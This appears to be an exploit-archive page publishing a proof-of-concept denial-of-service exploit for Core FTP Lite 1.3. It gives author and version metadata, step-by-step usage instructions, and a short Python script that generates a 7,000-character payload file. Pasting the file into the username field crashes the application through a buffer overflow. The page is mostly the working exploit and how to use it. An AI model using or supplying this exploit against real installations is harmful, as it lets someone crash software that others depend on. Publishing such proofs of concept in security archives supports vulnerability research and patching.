Core FTP Liter version 1.3 suffers from a denial of service vulnerability.
5c2b1034618e6314369304c7bfdb18c81b753450d81d426c036f04b76ea742f4# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Author: Berat Isler
# Date: 2020-02-20
# Vendor Homepage: https://www.coreftp.com/
# Software Link Download:https://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
# Version: Core FTP 1.3cBuild1437
# Tested on : Windows 7 32-bit
# First step , Run exploit script, it will generate a new file with the name "mi.txt"
# Then start Core FTP application and find the "username" textbox.
# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA"
# Don't need to click anything because application is already crash.
This is the code :
#!/usr/bin/python
b0f = "A" * 7000
payload = b0f
try:
f=open("mi.txt","w")
print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
f.write(payload)
f.close()
print "[+] File created :) "
except:
print "File cannot be created :(("
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed